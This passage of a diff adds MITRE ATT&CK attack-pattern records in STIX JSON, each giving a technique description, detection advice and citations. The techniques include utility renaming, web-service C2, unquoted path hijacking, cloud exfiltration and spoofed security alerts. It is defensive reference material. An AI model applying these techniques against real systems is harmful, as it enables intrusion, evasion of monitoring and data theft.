"description": "Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.", + "url": "https://www.commandfive.com/papers/C5_APT_SKHack.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-14T21:12:48.411Z", + "name": "Rename System Utilities", + "description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "created": "2020-02-10T20:03:11.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/003", + "external_id": "T1036.003" + }, + { + "source_name": "Twitter ItsReallyNick Masquerading Update", + "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.", + "url": "https://twitter.com/ItsReallyNick/status/1055321652777619457" + }, + { + "source_name": "Elastic Masquerade Ball", + "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.", + "url": "https://www.elastic.co/blog/how-hunt-masquerade-ball" + }, + { + "source_name": "F-Secure CozyDuke", + "description": "F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/CozyDuke" + }, + { + "source_name": "LOLBAS Main Site", + "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.", + "url": "https://lolbas-project.github.io/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Bidirectional Communication", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "created": "2020-03-14T22:34:03.024Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/002", + "external_id": "T1102.002" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Exploitation for Client Execution", + "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "x_mitre_system_requirements": [ + "Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1203", + "external_id": "T1203" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:10.374Z", + "name": "Program Download", + "description": "Adversaries may perform a program download to transfer a user program to a controller. \n\nVariations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download.\n\nThe granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controllers user program memory space. \n\n[Modify Controller Tasking](https://attack.mitre.org/techniques/T0821) and [Modify Program](https://attack.mitre.org/techniques/T0889) represent the configuration changes that are transferred to a controller via a program download.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0843", + "external_id": "T0843" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Wordlist Scanning", + "description": "Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).\n\nFor example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)). \n\nAs cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jan Petrov, Citi", + "Elvis Veliz, Citi", + "Richard Julian, Citi" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Monitor for access to S3 buckets, especially those that are not intended to be publicly accessible. \n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. \n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bed04f7d-e48a-4e76-bd0f-4c57fe31fc46", + "created": "2022-03-04T18:56:38.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1595/003", + "external_id": "T1595.003" + }, + { + "source_name": "ClearSky Lebanese Cedar Jan 2021", + "description": "ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf" + }, + { + "source_name": "GCPBucketBrute", + "description": "Spencer Gietzen. (2019, February 26). Google Cloud Platform (GCP) Bucket Enumeration and Privilege Escalation. Retrieved March 4, 2022.", + "url": "https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/" + }, + { + "source_name": "S3Recon GitHub", + "description": "Travis Clarke. (2020, March 21). S3Recon GitHub. Retrieved March 4, 2022.", + "url": "https://github.com/clarketm/s3recon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-12T22:46:33.995Z", + "name": "Spoof Security Alerting", + "description": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.\n\nRather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.\n\nFor example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "created": "2023-03-14T16:04:24.865Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/011", + "external_id": "T1562.011" + }, + { + "source_name": "BlackBasta", + "description": "Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.", + "url": "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Outlook Home Page", + "description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nOnce malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", + "created": "2019-11-07T20:09:56.536Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1137/004", + "external_id": "T1137.004" + }, + { + "source_name": "SensePost Outlook Home Page", + "description": "Stalmans, E. (2017, October 11). Outlook Home Page – Another Ruler Vector. Retrieved February 4, 2019.", + "url": "https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/" + }, + { + "source_name": "Microsoft Detect Outlook Forms", + "description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", + "url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack" + }, + { + "source_name": "SensePost NotRuler", + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/notruler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-12-26T20:59:21.941Z", + "name": "Asymmetric Cryptography", + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "created": "2020-03-16T15:48:33.882Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1573/002", + "external_id": "T1573.002" + }, + { + "source_name": "SANS Decrypting SSL", + "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", + "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840" + }, + { + "source_name": "SEI SSL Inspection Risks", + "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", + "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-15T19:11:47.547Z", + "name": "Exfiltration to Cloud Storage", + "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "created": "2020-03-09T15:04:32.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1567/002", + "external_id": "T1567.002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-01T13:48:28.738Z", + "name": "Lateral Tool Transfer", + "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.\n\nAdversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)\n\nFiles can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Shailesh Tiwary (Indian Army)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for file creation and files transferred within a network using protocols such as SMB or FTP. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "created": "2020-03-11T21:01:00.959Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1570", + "external_id": "T1570" + }, + { + "source_name": "Dropbox Malware Sync", + "description": "David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.", + "url": "https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/" + }, + { + "source_name": "Unit42 LockerGoga 2019", + "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.", + "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Path Interception by Unquoted Path", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", + "created": "2020-03-13T13:51:58.519Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/009", + "external_id": "T1574.009" + }, + { + "source_name": "Windows Privilege Escalation Guide", + "description": "absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.", + "url": "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/" + }, + { + "source_name": "Windows Unquoted Services", + "description": "HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.", + "url": "https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/" + }, + { + "source_name": "Help eliminate unquoted path", + "description": "Mark Baggett. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved November 8, 2012.", + "url": "https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464" + 